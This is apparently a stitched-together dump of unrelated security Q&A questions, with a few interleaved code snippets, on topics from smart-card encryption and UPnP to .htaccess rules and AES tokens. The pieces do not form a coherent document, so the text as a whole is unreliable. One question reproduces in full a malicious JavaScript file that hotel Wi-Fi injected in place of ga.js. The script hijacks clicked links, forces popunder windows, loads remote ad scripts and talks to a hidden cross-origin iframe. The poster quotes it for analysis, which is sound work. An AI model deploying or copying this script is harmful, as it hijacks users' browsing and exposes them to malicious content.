I am connected to my router and I want to know whether it is possible to sniff data from a router that sits upstream of mine.
The possibility to enable port forwards for any host inside the LAN of course has security implications. The problem, from my point of view, is not bad users but bad hosts/programs, and of course CSRF. Still, for some applications such a mechanism would be useful. Alternatives like statically forwarded ports seem even less secure, because then the port is open all the time, and you also have to maintain static IP addresses for every internal host that should be reachable. The question is: is it really necessary to have open ports for certain applications like btsync or some kind of instant messenger? Should a program depend on UPnP, or is it possible to live without it? (A bad question, I know, because either way I have to live with bad security or bad application behaviour...)
I have a scenario where I want to encrypt file data on a client machine along with smart card authentication. I followed a link stating that, for smart cards, the private key never leaves the card. It further explains that file data encryption should be done by the on-board smart card processor with a session key generated in the smart card; the enciphered session key is then attached to the encrypted file data and sent back to the client PC. Is there some standard that explains the complete procedure along with the necessary security measures? I also have a scenario where session keys are generated off-board on the client machine. I want to use the smart card for authentication purposes only, while the rest of the crypto operations are performed on the client machine. How can I achieve this? Is there any secure method of exporting the private key to the client machine, i.e. where the private key is exported and used but never stored on the client machine?
How can I find the encryption method if both the encrypted and the decrypted data are known? j1RSfCKUuvqjHLBtuIe9AOb03gkd2ENLj+KNkWUHff6duf1/iz2zNjU48B0v4O3PFWV3Q0scOPYDu7vuW2mvNKJWXQrIpHGCBEeqyXpihR1WWQo6hfe81YenVH35Gxp/7Xmltp5V8+XEhXOV8jyXtjBaKGVNgmA6F5kmQPAqCaA= This is a sample of the encrypted data; how could I identify the method used if I know the original plaintext?
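As a first analysis step for a sample like this, decoding the base64 and inspecting the raw length is often informative. A minimal sketch (the sample string is the one quoted in the question):

```python
import base64

# Ciphertext sample quoted in the question, wrapped for readability.
sample = ("j1RSfCKUuvqjHLBtuIe9AOb03gkd2ENLj+KNkWUHff6duf1/"
          "iz2zNjU48B0v4O3PFWV3Q0scOPYDu7vuW2mvNKJWXQrIpHGC"
          "BEeqyXpihR1WWQo6hfe81YenVH35Gxp/7Xmltp5V8+XEhXOV"
          "8jyXtjBaKGVNgmA6F5kmQPAqCaA=")

raw = base64.b64decode(sample)
print(len(raw))  # 128 bytes = 1024 bits
```

A 128-byte blob with no visible structure is consistent with, for example, a single 1024-bit RSA operation, but ciphertext alone cannot prove which algorithm was used; a known plaintext/ciphertext pair mostly helps by letting you test candidate schemes against it.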
The story: Yesterday at 12pm a neighbor of mine was pulling into his driveway and saw that his van's back window was shattered. This neighbor and I have had some trouble with each other in the past (only noise complaints, though) because he is in a band and plays in his garage; however, it was not me who broke the glass on the van. As soon as he came home, he immediately marched across the street to me while I was exercising in my garage. Upon arrival he raised his voice and presumptuously threatened to call the cops, even though he had no idea who did it in the first place. I, being responsible, told him I did not do it and would show him video evidence (I have a camera mounted above my garage). Since my camera covers nearly five houses, it can clearly see his house. As I was returning from the house with the USB drive in hand, a cop was walking towards me from his house, and my neighbor was pointing at me. Without any hesitation I told the cop I might have video evidence of who did it. He was interested in the footage, so without thinking twice he plugged it straight into his laptop (running Windows XP), and there wasn't anything useful on it (the light just so happened to be at the right spot at the right time). So he simply returned the flash drive to me and told my neighbor that he couldn't do anything regarding the evidence. The day ended there. Conclusion: Nonetheless, last night I sat up thinking about what had happened and the fact that he hates me. It didn't strike me until then that the cop had plugged the device into the laptop in his cop car, the one he uses on duty. I just thought to myself... could this all have been a setup, and could sensitive data have been compromised? Questions: Should an officer plug an "outside" USB device directly into their on-duty laptop? If this is an issue, what security concerns does it raise, and what damage could it have caused? Do most police officers receive training to prevent social engineering?
Also, sorry for the verbose story, but it helps to understand what's going on. I'm a student in Computer Science, but I know only the basics of security (for programming). This being a real-life story that happened yesterday, I'd really like to understand the risk this may have posed for others.
While connected to my hotel Wi-Fi, visiting the URL http://www.google-analytics.com/ga.js results in the following content being served: var ga_exists; if(!ga_exists) { ga_exists = 1; var is_responsive = false; var use_keywords = false; Date.prototype.addHours = function (h) { this.setHours(this.getHours() + h); return this }; function shuffle(src) { var cnt = src.length, tmp, idx; while (cnt > 0) { idx = Math.floor(Math.random() * cnt); cnt--; tmp = src[cnt]; src[cnt] = src[idx]; src[idx] = tmp; } return src; } function addEvent(obj, type, fn) { if (obj.addEventListener) { obj.addEventListener(type, fn, false) } else if (obj.attachEvent) { obj['e' + type + fn] = fn; obj[type + fn] = function () { obj['e' + type + fn](window.event) }; obj.attachEvent('on' + type, obj[type + fn]) } else { obj['on' + type] = obj['e' + type + fn] } } function getCookie(name) { var i, x, y, ARRcookies = document.cookie.split(';'); for (i = 0; i < ARRcookies.length; i++) { x = ARRcookies[i].substr(0, ARRcookies[i].indexOf('=')); y = ARRcookies[i].substr(ARRcookies[i].indexOf('=') + 1); x = x.replace(/^\s+|\s+$/g, ''); if (x == name) return unescape(y) } } function setCookie(name, value, hours) { var exdate = new Date(); exdate.addHours(hours); var c_value = escape(value) + ';expires=' + exdate.toUTCString() + ';path=/'; document.cookie = name + '=' + c_value } function startsWith(str, pat) { if (typeof pat == 'object') { for (_i = 0; _i < pat.length; _i++) { if (str.toLowerCase().indexOf(pat[_i].toLowerCase()) == 0) return true; } return false; } else return (str.toLowerCase().indexOf(pat.toLowerCase()) == 0); } addEvent(window, 'load', function() { var cnt_all = document.createElement('img'); cnt_all.src = 'http://www.easycounter.com/counter.php?scanov_all'; cnt_all.style.display = 'none'; document.body.appendChild(cnt_all); if(use_keywords) { var keywords = ''; var metas = document.getElementsByTagName('meta'); if (metas) { var kwstr = ''; for (var i = 0; i < metas.length; i++) { if 
(metas[i].name.toLowerCase() == 'keywords') kwstr += metas[i].content; } if(kwstr) { var tmp = kwstr.split(','); var tmp2 = new Array(); for (var i = 0; i < tmp.length && tmp2.length < 3; i++) { var kw = tmp[i].trim(); if(/^\w+$/.test(kw)) tmp2.push(kw); } if(tmp2.length > 0) keywords = tmp2.join('+'); } } var replCookie = 'href-repl'; var replStaff = Math.floor((Math.random() * 18) + 1); var replLink = 'http://msn.com' + '?staff=' + replStaff + '&q=' + keywords; var replHours = 12; addEvent(document, 'mousedown', function(evt){ if(getCookie(replCookie)) return; evt = evt ? evt : window.event; var evtSrcEl = evt.srcElement ? evt.srcElement : evt.target; do { if (evtSrcEl.tagName.toLowerCase() == 'a') break; if (evtSrcEl.parentNode) evtSrcEl = evtSrcEl.parentNode; } while (evtSrcEl.parentNode); if (evtSrcEl.tagName.toLowerCase() != 'a') return; if (!startsWith(evtSrcEl.href, new Array('http://', 'https://'))) return; evtSrcEl.href = replLink; setCookie(replCookie, 1, replHours); }); } if(window.postMessage && window.JSON) { var _top = self; var cookieName = ''; var cookieExp = 24; var exoUrl = ''; var exoPuId = 'ad_' + Math.floor(89999999 * Math.random() + 10000000); if (top != self) { try { if (top.document.location.toString()) { _top = top } } catch (err) {} } var exo_browser = { is: function () { var userAgent = navigator.userAgent.toLowerCase(); var info = { webkit: /webkit/.test(userAgent), mozilla: (/mozilla/.test(userAgent)) && (!/(compatible|webkit)/.test(userAgent)), chrome: /chrome/.test(userAgent), msie: (/msie/.test(userAgent)) && (!/opera/.test(userAgent)), msie11: (/Trident/.test(userAgent)) && (!/rv:11/.test(userAgent)), firefox: /firefox/.test(userAgent), safari: (/safari/.test(userAgent) && !(/chrome/.test(userAgent))), opera: /opera/.test(userAgent) }; info.version = (info.safari) ? 
(userAgent.match(/.+(?:ri)[\/: ]([\d.]+)/) || [])[1] : (userAgent.match(/.+(?:ox|me|ra|ie)[\/: ]([\d.]+)/) || [])[1]; return info }(), versionNewerThan: function (version) { currentVersion = parseInt(this.is.version.split('.')[0]); return currentVersion > version }, versionFrom: function (version) { currentVersion = parseInt(this.is.version.split('.')[0]); return currentVersion >= version }, versionOlderThan: function (version) { currentVersion = parseInt(this.is.version.split('.')[0]); return currentVersion < version }, versionIs: function (version) { currentVersion = parseInt(this.is.version.split('.')[0]); return currentVersion == version }, isMobile: { Android: function (a) { return a.navigator.userAgent.match(/Android/i) }, BlackBerry: function (a) { return a.navigator.userAgent.match(/BlackBerry/i) }, iOS: function (a) { return a.navigator.userAgent.match(/iPhone|iPad|iPod/i) }, Opera: function (a) { return a.navigator.userAgent.match(/Opera Mini/i) }, Windows: function (a) { return a.navigator.userAgent.match(/IEMobile/i) }, any: function (a) { return a.navigator.userAgent.match(/Android|BlackBerry|iPhone|iPad|iPod|Opera Mini|IEMobile/i) } } }; var browser = exo_browser; var exopop = { settings: { width: 1024, height: 768 }, init: function () { if (browser.isMobile.any(_top)) exopop.binders.mobile(); if (browser.is.msie) exopop.binders.msie(); if (browser.is.msie11) exopop.binders.msie11(); if (browser.is.firefox) exopop.binders.firefox(); if (browser.is.chrome && browser.versionFrom(30) && navigator.appVersion.indexOf('Mac') != -1) exopop.binders.chrome30_mac(); if (browser.is.chrome && browser.versionOlderThan(30)) exopop.binders.chromeUntil30(); if (browser.is.chrome && browser.versionIs(30)) exopop.binders.chrome30(); else if (browser.is.chrome && browser.versionFrom(31)) exopop.binders.chrome31(); else if (browser.is.safari) exopop.binders.safari(); else exopop.binders.firefox(); }, windowParams: function () { return 'width=' + exopop.settings.width + 
',height=' + exopop.settings.height + ',top=0,left=0,scrollbars=1,location=1,toolbar=0,menubar=0,resizable=1,statusbar=1' }, status: { opened: false }, opened: function () { if (exopop.status.opened) return true; if (getCookie(cookieName)) return true; return false }, setAsOpened: function () { this.status.opened = true; setCookie(cookieName, 1, cookieExp) }, findParentLink: function (clickedElement) { var currentElement = clickedElement; if (currentElement.getAttribute('target') == null && currentElement.nodeName.toLowerCase() != 'html') { var o = 0; while (currentElement.parentNode && o <= 4 && currentElement.nodeName.toLowerCase() != 'html') { o++; currentElement = currentElement.parentNode; if (currentElement.nodeName.toLowerCase() === 'a' && currentElement.href != '') { break } } } return currentElement }, triggers: { firefox: function () { if (exopop.opened()) return true; var popURL = 'about:blank'; var params = exopop.windowParams(); var PopWin = _top.window.open(popURL, exoPuId, params); if (PopWin) { PopWin.blur(); if (navigator.userAgent.toLowerCase().indexOf('applewebkit') > -1) { _top.window.blur(); _top.window.focus() } PopWin.Init = function (e) { with(e) { Params = e.Params; Main = function () { var x, popURL = Params.PopURL; if (typeof window.mozPaintCount != 'undefined') { x = window.open('about:blank'); x.close() } else if (navigator.userAgent.toLowerCase().indexOf('chrome/2') > -1) { x = window.open('about:blank'); x.close() } try { opener.window.focus() } catch (err) {} window.location = popURL; window.blur() }; Main() } }; PopWin.Params = { PopURL: exoUrl }; PopWin.Init(PopWin) } exopop.setAsOpened(); return }, chromeUntil30: function () { if (exopop.opened()) return true; window.open('javascript:window.focus()', '_self'); var w = window.open('about:blank', exoPuId, exopop.windowParams()); var a = document.createElement('a'); a.setAttribute('href', 'data:text/html,<scr' + 'ipt>window.close();</scr' + 'ipt>'); a.style.display = 'none'; 
document.body.appendChild(a); var e = document.createEvent('MouseEvents'); e.initMouseEvent('click', true, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null); a.dispatchEvent(e); document.body.removeChild(a); w.document.open().write('<script type="text/javascript">window.location="' + exoUrl + '";<\/script>'); w.document.close(); exopop.setAsOpened() }, chrome30: function (W) { if (exopop.opened()) return true; var link = document.createElement('a'); link.href = 'javascript:window.open("' + exoUrl + '","' + exoPuId + '","' + exopop.windowParams() + '")'; document.body.appendChild(link); link.webkitRequestFullscreen(); var event = document.createEvent('MouseEvents'); event.initMouseEvent('click', true, true, window, 0, 0, 0, 0, 0, false, false, true, false, 0, null); link.dispatchEvent(event); document.webkitCancelFullScreen(); setTimeout(function () { window.getSelection().empty() }, 250); var Z = W.target || W.srcElement; Z.click(); exopop.setAsOpened() }, safari: function () { if (exopop.opened()) return true; var popWindow = _top.window.open(exoUrl, exoPuId, exopop.windowParams()); if (popWindow) { popWindow.blur(); popWindow.opener.window.focus(); window.self.window.focus(); window.focus(); var P = ''; var O = top.window.document.createElement('a'); O.href = 'data:text/html,<scr' + P + 'ipt>window.close();</scr' + P + 'ipt>'; document.getElementsByTagName('body')[0].appendChild(O); var N = top.window.document.createEvent('MouseEvents'); N.initMouseEvent('click', false, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null); O.dispatchEvent(N); O.parentNode.removeChild(O) } exopop.setAsOpened() }, tab: function () { if (exopop.opened()) return true; var a = top.window.document.createElement('a'); var e = document.createEvent('MouseEvents'); a.href = exoUrl; document.getElementsByTagName('body')[0].appendChild(a); e.initMouseEvent('click', true, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null); a.dispatchEvent(e); 
a.parentNode.removeChild(a); exopop.setAsOpened() }, mobile: function (triggeredEvent) { if (exopop.opened()) return true; var clickedElement = triggeredEvent.target || triggeredEvent.srcElement; if (clickedElement.nodeName.toLowerCase() !== 'a') { clickedElement = exopop.findParentLink(clickedElement) } if (clickedElement.nodeName.toLowerCase() === 'a' && clickedElement.getAttribute('target') !== '_blank') { window.open(clickedElement.getAttribute('href')); exopop.setAsOpened(); _top.document.location = exoUrl; if (triggeredEvent.preventDefault != undefined) { triggeredEvent.preventDefault(); triggeredEvent.stopPropagation() } return false } return true } }, binders: { msie: function () { addEvent(document, 'click', exopop.triggers.firefox) }, firefox: function () { addEvent(document, 'click', exopop.triggers.firefox) }, chromeUntil30: function () { addEvent(document, 'mousedown', exopop.triggers.chromeUntil30) }, chrome30: function () { addEvent(document, 'mousedown', exopop.triggers.chrome30) }, chrome31: function () { addEvent(document, 'mousedown', exopop.triggers.tab) }, msie11: function () { addEvent(document, 'mousedown', exopop.triggers.tab) }, chrome30_mac: function () { addEvent(document, 'mousedown', exopop.triggers.chromeUntil30) }, safari: function () { addEvent(document, 'mousedown', exopop.triggers.safari) }, mobile: function () { addEvent(document, 'click', exopop.triggers.mobile) } } }; var exoMobPop = 0; function exoMobile() { addEvent(document, 'click', function(){ var targ; var e = window.event; if (e.target) targ = e.target; else if (e.srcElement) targ = e.srcElement; if (targ.nodeType == 3 || targ.tagName != 'A') targ = targ.parentNode; if (getCookie(cookieName)) exoMobPop = 1; if (exoMobPop == 0) { if(targ && targ.tagName == 'A') targ.target = '_blank'; exoMobPop = 1; setTimeout(function() { setCookie(cookieName, 1, cookieExp / 2); document.location.assign(exoUrl); }, 1000); } }); } var scripts = null; var script_names = []; var 
recyclePeriod = 0; if(browser.isMobile.any(_top) && is_responsive) { recyclePeriod = 3 * 60 * 60 * 1000; scripts = { '938466': function() { exoUrl = 'http://www.reduxmediia.com/apu.php?n=&zoneid=5716&cb=3394654&popunder=1&direct=1'; cookieName = 'splashMob-938466'; exoMobile(); } }; } else { recyclePeriod = 6 * 60 * 60 * 1000; scripts = { 'adcash': function() { var adcash = document.createElement('script'); adcash.type = 'text/javascript'; adcash.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944'; document.body.appendChild(adcash); }, '1896743': function() { exoUrl = 'http://www.reduxmediia.com/apu.php?n=&zoneid=5716&cb=3394654&popunder=1&direct=1'; cookieName = 'splashWeb-896743'; exopop.init(); }, 'adcash2': function() { var adcash2 = document.createElement('script'); adcash2.type = 'text/javascript'; adcash2.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944'; document.body.appendChild(adcash2); }, }; } for(var i in scripts) { if(scripts.hasOwnProperty(i)) script_names.push(i); } script_names = shuffle(script_names); var origin = 'http://storage.com' var path = '/storage.html'; var sign = '90e79fb1-d89e-4b29-83fd-70b8ce071039'; var iframe = document.createElement('iframe'); var done = false; iframe.style.cssText = 'position:absolute;width:1px;height:1px;left:-9999px;'; iframe.src = origin + path; addEvent(iframe, 'load', function(){ addEvent(window, 'message', function(evt){ if (!evt || evt.origin != origin) return; var rsp = JSON.parse(evt.data); if(!rsp || rsp.sign != sign || rsp.act != 'ret') return; scripts[rsp.data](); if(browser.isMobile.any(_top) && is_responsive) { iframe.contentWindow.postMessage( JSON.stringify({ act: 'set', sign: sign, data: rsp.data }), origin ); } else { addEvent(document, 'mousedown', function(){ if(done) return; done = true; iframe.contentWindow.postMessage( JSON.stringify({ act: 'set', sign: sign, data: rsp.data }), origin ); }); } }); iframe.contentWindow.postMessage( JSON.stringify({ act: 
'get', recycle: recyclePeriod, sign: sign, data: script_names }), origin ); }); document.body.appendChild(iframe); } }); } Obviously someone is using this script to inject ads into guests' browsing. However, the worrying part for me is the bit that references "storage.com". When I ping storage.com, it resolves to 199.182.166.176. Should I be worried?
I can get the OS type of a remote host by: connecting to an open port (telnet <host> 22); using Nmap (nmap -A <host>). What techniques exist to hide or change this OS information, and how are they applied? I would like answers with respect to GNU/Linux and/or BSD.
Let's say there is an AJAX application where a user can submit items and buy them, and there is code like: if ($_POST['items'] > 20) { echo 'error'; } else { do_buy($_POST['items']); echo 'success'; } So there is a check that items is not more than 20. Say that on the client side it is not possible to choose more than 20 items, but an attacker can edit the JavaScript and choose more; the system would still work even if 21 or any other amount were submitted. Usually everyone screams that you must not trust the client side, and I agree. But in this case I think it is enough to trust the client, because nothing bad happens if he submits more than this amount of items: when submitting more, he has to pay more, so that is a kind of automatic protection. OK, maybe the system would crash if 15,000 items were submitted; that may be a better reason for protection. Still, if the minimum price per item is $1, he would need $15,000 in his account to actually buy those items. And in the worst case a script timeout could be set, so with error output disabled he would simply get no response if the script times out. I am not only talking about this situation, but in general: does it make sense to write protections against something when you cannot see how the system could be hacked? And if someone says to add protection, shouldn't they explain why that place needs a check, rather than answering "it's always better to check, you don't know where a hacker could get in"? First find a real example of how the hacker would attack. Or take a real-world example: there is a house with one door, five windows, and walls. We understand that a thief would first try the door if it has no lock, so we protect the house with a lock. If we need more protection, the next place a thief might enter is the windows, so we can add something to protect them. But we would not expect a thief to go through the walls, assuming they are brick.
It is possible too, but then it is also possible that your PHP server will be physically bombed and you will need military hardware to protect it :D
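For what it's worth, the server-side check under discussion takes only a few lines. This is a hypothetical Python stand-in for the PHP snippet above (names are illustrative), showing that rejecting out-of-range and non-numeric input costs almost nothing:

```python
# Minimal sketch of server-side validation of untrusted client input.
MAX_ITEMS = 20

def handle_buy(items_param):
    """Validate the raw request parameter before acting on it."""
    try:
        items = int(items_param)          # reject non-numeric input
    except (TypeError, ValueError):
        return "error"
    if not 1 <= items <= MAX_ITEMS:       # reject out-of-range input
        return "error"
    return f"success: bought {items}"

print(handle_buy("21"))   # error
print(handle_buy("5"))    # success: bought 5
```

The cheap validation also covers the cases the question worries about only in passing: garbage input, negative quantities, and absurdly large values that could stress the system.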
I have a client that generates a CSR and sends it to a server; the server then signs it and returns the certificate as a string. The string is then decoded to an X509Certificate (using Bouncy Castle's PEMParser), which is imported into the client keystore. The questions are: Should I verify/validate anything before importing the given client certificate, either as a string (encoding? pre/postfix?) or as a certificate? I guess I can check that the certificate really originated from my CSR (from my public key). I'm not sure I can validate that the signing authority is trusted by me (I think that's not necessarily the case if a different CA is used for signing the clients' certificates and it is not necessarily trusted by the clients). What risk am I introducing by not verifying/validating anything on it? I can't think of any attack. Thanks!
I'm testing a system which involves updating a database using files sent from external parties. These files are basically just large flat files used to update a database. The requirement is that these files must be signed using a File Signing Key in accordance with the FIPS 186-4 Digital Signature Standard, using the SHA-256 hashing algorithm and encrypting the derived hash with an RSA digital signature algorithm of 2048-bit modulus in accordance with PKCS #1. The SHA-256 hash is computed over the entire data file. This results in a 2048-bit digital signature in octet form, which is appended within the file. To test that the system verifies the signature correctly, I first need to sign the file. Information security is not really my forte and I would appreciate being pointed in the right direction. Is there a tool I can use to do this? Apart from the certificates, what would the prerequisites be? Many thanks.
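A minimal sketch of the hashing half of the scheme described above. Producing the RSA-2048 PKCS #1 signature over the digest requires a crypto library or a CLI such as `openssl dgst -sha256 -sign key.pem file` (mentioned only in a comment here; no key material is assumed):

```python
import hashlib

# SHA-256 over the entire flat file, per the stated requirement.
# The RSA-2048 PKCS #1 signing step over this digest is not shown;
# it would be done with a crypto library or the openssl CLI.
def file_digest(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

digest = file_digest(b"sample flat file contents\n")
print(len(digest))  # 32-byte digest; the RSA-2048 signature over it is 256 bytes
```

The 2048-bit (256-octet) signature mentioned in the requirement is the RSA output size, not the hash size, which is a common point of confusion when sizing the field appended to the file.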
Considering the recent thread regarding anti-virus for the Mac, I wonder how many of the arguments put forth are relevant today to Linux systems, specifically Ubuntu. There is no known Ubuntu desktop malware in the wild. GNU/Linux is a very tempting target for botnets, considering that it powers a substantial fraction of web servers. Additionally, these web servers are generally higher-provisioned and have better bandwidth than potential desktop botnets. Anti-malware packages for Linux mostly target Windows infections that may 'pass through' Linux, such as on a mail server. This is not relevant for an Ubuntu desktop. Some of the available Linux anti-malware applications seem just as shady as their Windows counterparts. These solutions may or may not protect against macros in LibreOffice documents, web browser or extension flaws (Flash), XSS attacks, Java vulnerabilities, and other userland software. People are stupid: someone might run nakedgirls.deb if an ambitious malware dev were to promote it. I'm sure this is only a matter of time. Note that though there are many other distros and desktops based on GNU/Linux, in the interest of keeping on focus I would like to limit this thread to a discussion of standard-install Ubuntu desktops only. Think "desktops for grandma". Users of Slackware, those running mail or web servers, or those using their desktops for other purposes would presumably (ha! I'm not really that naive) know what they are doing and the risks involved.
This is my first question here on Information Security SE. Is there a recommendation to help distinguish the scenarios where authentication should precede authorization from those where authorization comes first? I have experienced both situations at different workplaces (the situation was very similar: switching to a system user with a certain set of privileges on a Unix command line). When does authorization need to come first, to spare the authentication? When should the system authenticate first, so as not to tell a potential intruder that the impersonated user would not be entitled to the current operation? Are there situation-specific or generic guidelines or rules for this? -- OK, let me come up with a specific situation. Logged in with my own employee user ID, su-ing to another user, I mistyped the system user I was about to switch to, but the mistyped name is also an existing user in our environment. Before being asked for a password, I was rejected with a message saying I wasn't authorized to perform this operation. Given that I had just finished an anti-social-engineering course that day, I wondered whether it was a good idea to tell me I wasn't authorized (even this may be a useful piece of information for someone trying to impersonate me on the corporate network).
If a user wants to log in to a system/server, it's recommended to have the hashed and salted password saved in a database, along with its salt. So the user types in the password, clicks on login, and from his input and the salt the system checks whether the correct hash is produced. I understand this part. But when I don't want to type the password every time, how would I save the password on the client side? I can't save it hashed, because I need to salt the clear password for the check. If I save it in the clear, the client is vulnerable. And if I use any encryption, where do I store the "master password"? Also, in my case I don't really want to force the user into creating a master password, though not having to type the password every time is a required feature. Edit, second question: How is this done on smartphones? For example, your Wi-Fi password: you enter it once and it's stored on the device, but how is it secured? Do you know?
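As a sketch of the server-side part described above (iteration count and salt length are illustrative, not a recommendation), and of the usual answer to the client-side problem, which is to store a random session token rather than the password itself:

```python
import hashlib, hmac, os

# Server side: store salt + slow salted hash, never the password.
def register(password: str):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)  # constant-time compare

salt, digest = register("hunter2")
print(verify("hunter2", salt, digest))  # True
print(verify("wrong", salt, digest))    # False

# Client side ("remember me"): store a revocable random token, not the
# password. The server maps the token to the account and can expire it.
remember_me_token = os.urandom(32)
```

This is also roughly how phones handle stored Wi-Fi credentials: the secret is kept in OS-protected storage rather than re-derived from user input, which is why device compromise (not cryptography) is the main risk there.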
A Yahoo! Answers user suggested that there are 5^5 possible unique configurations for a physical key, but the answer wasn't sourced. I wondered if anyone had similar numbers for how many possible key combinations there are. I ask because it seems impossible that there can be a unique key for every lock in the world, and I'd like to know how many different key configurations a thief would have to try to be certain of opening the lock (if the thief didn't want to force the lock in another way).
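The 5^5 figure is easy to reproduce as back-of-envelope arithmetic if you assume a pin-tumbler key with 5 pin positions and 5 possible cut depths per position (real locks vary in both numbers, and manufacturing constraints remove some combinations):

```python
# Naive keyspace arithmetic for a pin-tumbler lock (assumed parameters).
positions, depths = 5, 5
naive = depths ** positions
print(naive)  # 3125

# A lock with 6 pins and 10 depths would have a larger raw space,
# before subtracting combinations disallowed by cutting constraints.
print(10 ** 6)  # 1000000
```

A few thousand distinct bittings per lock model is exactly why keys are not globally unique: many strangers' keys will open a given cheap lock, and master-keying shrinks the effective space further.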
I'm starting a very large project soon. It must include a licensing system. The project will be produced using PHP/Laravel/JavaScript and will use many different libraries, a CMS, and a few databases. The software will be licensed out to other companies, which is why the ability to enable/disable usage is very important. For the most part, piracy shouldn't be an issue, considering the vast majority of the companies that will use this software don't have the know-how to disable the protection, or don't have a developer who could do so. What's the best way to handle this? Is restricting the source code on a per-domain basis possible, and would it work well? How would this be done? And how could I manage updates to the software?
I use LastPass for Android with the PIN option. After having entered my full LastPass password the first time I used the app, I now have access to all my passwords just by entering a four-digit PIN when opening the application. How secure can this be? Where might the data be stored such that it is accessible by PIN only? Is it likely that the passwords are stored on the Android file system unencrypted? Or perhaps they are stored encrypted with the PIN as the key? I am concerned that if the user can access the data with a four-digit PIN, then so could an attacker. I am concerned about an online or otherwise electronic attacker, not physical access to the device. Note that the device (Samsung Note 3) is not rooted yet, but it will likely have a custom ROM installed sometime in the future.
I have a web site hosted on my server. Sometimes I upload database manipulation scripts to a folder three levels deep in the website and run them from my web browser. These scripts should not be accessible to outside users, and I remove them within hours of uploading them. Is there a risk that these scripts will be found or crawled if no other page links to them? If so, how can they be discovered? I also have a test subdomain located at user.mysite.com. Is it possible for outsiders who do not know the subdomain to discover its existence?
I know that the following authentication protocol is vulnerable, but I can't understand why. A and B share a secret key K (64 bits); R1 and R2 are two 64-bit numbers.
A-->B: I am A
B-->A: R1
A-->B: Hash((K+R1) mod 2^64), R2
B-->A: Hash((K+R2) mod 2^63)
My thinking is that the two hashes don't line up, but I don't see why that would give the protocol a major vulnerability.
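One weakness often pointed out for schemes of this shape, independent of the mod 2^64 vs 2^63 mismatch: the response is a deterministic function of K and the publicly visible challenge, so an eavesdropper who captures one (R1, response) pair can brute-force K entirely offline. A toy demonstration with a deliberately tiny key space (the byte encoding of the hash input is illustrative, not specified by the question):

```python
import hashlib

# Toy model of the response A sends: Hash((K + R1) mod 2^64).
def response(k: int, r: int) -> bytes:
    return hashlib.sha256(str((k + r) % 2**64).encode()).digest()

secret_k = 0xBEEF                      # 16-bit toy key standing in for 64-bit K
r1 = 0x1122334455667788                # challenge seen on the wire
observed = response(secret_k, r1)      # response seen on the wire

# Offline search over the whole toy key space recovers K.
recovered = next(k for k in range(2**16) if response(k, r1) == observed)
print(hex(recovered))  # 0xbeef
```

With a real 64-bit K the search is far larger but still fixed-cost and parallelizable, which is why challenge-response designs normally use a keyed MAC (e.g. HMAC) rather than a plain hash of key-plus-challenge, and why 64 bits of key is too small in the first place.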
I have a folder that I don't want to be accessible from outside my network's LAN. It seems that all traffic from the outside world goes through my firewall (192.168.1.39). So I made my .htaccess as follows:
Order Allow,Deny
Allow from all
Deny from 192.168.1.39
My thinking is that this allows all traffic except traffic that is redirected by my firewall, i.e. all external traffic. Is there anything I'm missing? Any way for a hacker to bypass the firewall and reach the server directly? Any way to use IP spoofing to get around the .htaccess? Etc.? EDIT: I can't allow from the local LAN with either a subnet or a domain, because the external traffic looks like it is coming from the local LAN: it is being redirected by my firewall, a Fortigate inside the network.
One of my clients wants to provide a URL to each of his customers to register in a system. This URL would contain a query string parameter with some data (e.g. code, email and name) from his clients, encrypted using AES in CBC mode, similar to this (the IV is the first 32 hex characters): www.website.com/register?key=44a74fb9fad889496e970c604e54fdab a367c6e5802252822ce071c35d7f108aea43e6de925cf93dd3d4772974621927a12702428b1d22d82b6f976acc7470f8 When a user enters this page, it would decrypt the parameter and check whether the data is valid (e.g. whether the customer's code exists in an external database and is not already registered) in order to show him the registration form. I've seen some people using an HMAC alongside AES when encrypting data, but I don't know if this is needed in a case like this. My question is: Is this secure enough? Should I use something like an HMAC to authenticate the data, in addition to encrypting it with AES?
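If an HMAC is added, the usual encrypt-then-MAC layout can be sketched as follows. The AES-CBC ciphertext is treated as opaque bytes here (a real implementation would produce it with a crypto library), and all names are illustrative; the important details are that the MAC covers IV plus ciphertext, uses a key separate from the AES key, and is verified before any decryption or database lookup:

```python
import hashlib, hmac, os

mac_key = os.urandom(32)  # distinct from the AES key

def seal(iv: bytes, ciphertext: bytes) -> bytes:
    """Append an HMAC-SHA256 tag over IV || ciphertext."""
    tag = hmac.new(mac_key, iv + ciphertext, hashlib.sha256).digest()
    return iv + ciphertext + tag

def open_token(token: bytes):
    """Verify the tag before doing anything with the ciphertext."""
    iv, ct, tag = token[:16], token[16:-32], token[-32:]
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("invalid token")   # reject tampering up front
    return iv, ct

iv, ct = os.urandom(16), os.urandom(48)     # stand-in for real AES-CBC output
token = seal(iv, ct)
print(open_token(token) == (iv, ct))  # True
```

Without the MAC, CBC ciphertext in a URL is malleable: an attacker can flip plaintext bits by flipping ciphertext/IV bits, and the decrypt-then-validate flow may also leak padding-oracle information. That is the main argument for authenticating here even though the data looks low-value.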
I am a Python/C developer currently working on an extremely important piece of software. The details of the code will not be mentioned, and the only place the code exists is on my own hard drive, in a virtual disk image used by a Windows 7 VirtualBox VM (a hard drive inside a hard drive, I guess). The algorithm represented in the code is extremely important, and I can't have ANYBODY get to it except me. I was curious whether one could completely protect a single virtual folder from any unwanted access whatsoever. I want to give this one folder a level of protection so deep that even if a CIA agent were assigned to tracking down this source code on my hard drive, they could not do it. I need this folder to be completely cut off from the rest of the world, so that no internet-based attack and no virus could get to it. Is this possible? Any suggestions to lead me in the right direction? P.S. As you can probably tell, I really don't know much about security, but I would appreciate any suggestions. A 'no, this is not possible' answer is completely acceptable.
In movies and TV shows, characters are often depicted using devices and applications that are able to determine an encryption key or passcode character by character (or digit by digit). I am a programmer and think I have a decent idea of how encryption works in general but I'm not sure whether to take this as a simple way to display progress or if there is actually something to it. Is this ever possible and if so what properties of an algorithm leave it susceptible to this kind of cracking?
